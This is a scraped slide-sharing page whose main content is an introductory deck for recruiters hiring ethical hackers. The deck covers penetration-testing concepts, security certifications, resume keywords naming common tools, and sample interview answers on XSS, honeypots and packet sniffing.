Best Forex Brokers Comparison in INDIA 2024Best Forex Brokers Comparison in INDIA 2024
Best Forex Brokers Comparison in INDIA 2024
 
Understanding User Needs and Satisfying Them
Understanding User Needs and Satisfying ThemUnderstanding User Needs and Satisfying Them
Understanding User Needs and Satisfying Them
 
Part 2 Deep Dive: Navigating the 2024 Slowdown
Part 2 Deep Dive: Navigating the 2024 SlowdownPart 2 Deep Dive: Navigating the 2024 Slowdown
Part 2 Deep Dive: Navigating the 2024 Slowdown
 
Easily Verify Compliance and Security with Binance KYC
Easily Verify Compliance and Security with Binance KYCEasily Verify Compliance and Security with Binance KYC
Easily Verify Compliance and Security with Binance KYC
 
Structural Design Process: Step-by-Step Guide for Buildings
Structural Design Process: Step-by-Step Guide for BuildingsStructural Design Process: Step-by-Step Guide for Buildings
Structural Design Process: Step-by-Step Guide for Buildings
 
Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.
Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.
Anny Serafina Love - Letter of Recommendation by Kellen Harkins, MS.
 
Creative Web Design Company in Singapore
Creative Web Design Company in SingaporeCreative Web Design Company in Singapore
Creative Web Design Company in Singapore
 
Digital Marketing with a Focus on Sustainability
Digital Marketing with a Focus on SustainabilityDigital Marketing with a Focus on Sustainability
Digital Marketing with a Focus on Sustainability
 
The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...
The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...
The Heart of Leadership_ How Emotional Intelligence Drives Business Success B...
 
❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...
❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...
❼❷⓿❺❻❷❽❷❼❽ Dpboss Matka Result Satta Matka Guessing Satta Fix jodi Kalyan Fin...
 
Income Tax exemption for Start up : Section 80 IAC
Income Tax exemption for Start up : Section 80 IACIncome Tax exemption for Start up : Section 80 IAC
Income Tax exemption for Start up : Section 80 IAC
 
How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...
How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...
How to Implement a Strategy: Transform Your Strategy with BSC Designer's Comp...
 
BeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdfBeMetals Investor Presentation_June 1, 2024.pdf
BeMetals Investor Presentation_June 1, 2024.pdf
 
Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...
Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...
Brian Fitzsimmons on the Business Strategy and Content Flywheel of Barstool S...
 
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
Hamster Kombat' Telegram Game Surpasses 100 Million Players—Token Release Sch...
 
Best practices for project execution and delivery
Best practices for project execution and deliveryBest practices for project execution and delivery
Best practices for project execution and delivery
 
一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理
一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理
一比一原版新西兰奥塔哥大学毕业证(otago毕业证)如何办理
 

Recruiters' guide to hire an Ethical hacker

  • 1. Ethical Hacking & Penetration testing General Knowledge Ayman Mohammed – CEH http://www.AymanMohammed.com
  • 2. Outline • Introduction • Certificates • Keywords • Questions • References
  • 3. General tips about information security career
  • 4. Introduction to Ethical Hacking • Ethical hackers ▫ Employed by companies to perform penetration tests • Penetration test ▫ Legal attempt to break into a company’s network to find its weakest link ▫ Tester only reports findings • Security test ▫ More than an attempt to break in; also includes analyzing company’s security policy and procedures ▫ Tester offers solutions to secure or protect the network
  • 5. The Role of Security and Penetration Testers • Hackers ▫ Access computer system or network without authorization ▫ Breaks the law; can go to prison • Crackers ▫ Break into systems to steal or destroy data ▫ U.S. Department of Justice calls both hackers • Ethical hacker ▫ Performs most of the same activities but with owner’s permission
  • 6. Penetration-Testing Methodologies • White box model ▫ Tester is told everything about the network topology and technology ▫ Tester is authorized to interview IT personnel and company employees ▫ Makes tester job a little easier • Black box model ▫ Company staff does not know about the test ▫ Tester is not given details about the network  Burden is on the tester to find these details ▫ Tests if security personnel are able to detect an attack • Gray box model ▫ Hybrid of the white and black box models ▫ Company gives tester partial information
  • 7. Ethical Hacking in a Nutshell • What it takes to be a security tester ▫ Knowledge of network and computer technology ▫ Ability to communicate with management and IT personnel ▫ Understanding of the laws ▫ Ability to use necessary tools
  • 8. Known certificates in cyber security field
  • 9. Most famous certificates • EC-Council ▫ CEH(Certified Ethical Hacker) ▫ ECSA (EC-Council Certified Security Analyst) ▫ LPT(Lice sensed Penetration Tester) • SANSGIAC (Global Information Assurance Certification) ▫ GPEN(GIAC Certified Penetration Tester ) ▫ GWAPT(GIAC Web Application Penetration Tester) • OSSTMM (The Open Source Security Testing Methodology Manual) ▫ OPST (OSSTMM PROFESSIONAL SECURITY TESTER ACCREDITED CERTIFICATION) ▫ OPSA (OSSTMM PROFESSIONAL SECURITY ANALYST ACCREDITED CERTIFICATION) ▫ OPSE (OSSTMM PROFESSIONAL SECURITY EXPERT ACCREDITED CERTIFICATION) • Mile2 ▫ CPTEngineer(Certified Pen Testing Engineer)
  • 10. Keywords you need to know , and search inside the resume
  • 11. Top Keywords • Certificates : ▫ CEH , ICSSP , LPT , CPTEngineer , ECSA , GPEN, OPST ,OPSA ,OPSE , CISM, CISA • Tools: ▫ Kali , Metasploit , sqlmap , Burp Suite , Acunitix ,IBM Appscan ,Nmap ,Cain & Able ,WireShark ,Nessus ,snort ,OpenSSH ,BackTrack ,Brutus ,John the Ripper. • Methodologies : ▫ OWASP Top 10 , PCI-DSS • Vulnerabilities : ▫ XSS , Sql injection , CSRF , session hijacking , ....
  • 12. Some questions to assess the Penetration testing knowledge
  • 13. Questions & answers • Q. What is XSS or Cross Site Scripting? Ans. XSS or cross site scripting is type of vulnerability  that hackers used to attack web applications. • It allows hackers to inject HTML or JAVASCRIPT code  into a web page which can steal the confidential  information from the cookies and returns to the hackers.  It is one of the most critical and common technique  which needs to be prevented. • Q. What is a honeypot? Ans. Honeypot is fake computer system which behaves  like a real system and attracts hackers to attack on it.  Honeypot is used to find out loop holes in the system  and to provide solution for these kinds of attacks.
  • 14. Questions & answers (cont.) • Q. What type of tools are there out there for packet sniffing? Ans.  Wireshark is probably the most common  packet sniffing tool. This program can help you find  odd traffic across the network or identify a program  that is sending traffic silently from a host.  • Q. Which tools are you using in Performing automatic vulnerability testing? Ans. There are many tools to do so , the most  famous tools are Acunitix , IBM Appscan , Burb  suite , ZAP.
  • 16. • http://www.softwaretestinghelp.com/interview- questions/security-testing-interview-questions- and-answers/ • http://www.eccouncil.org/Certification/professi onal-series/ceh-course-outline • http://www.zdnet.com/article/10-things-you- need-to-know-before-hiring-penetration- testers/ • https://www.owasp.org/index.php/Top_10_201 3-Table_of_Contents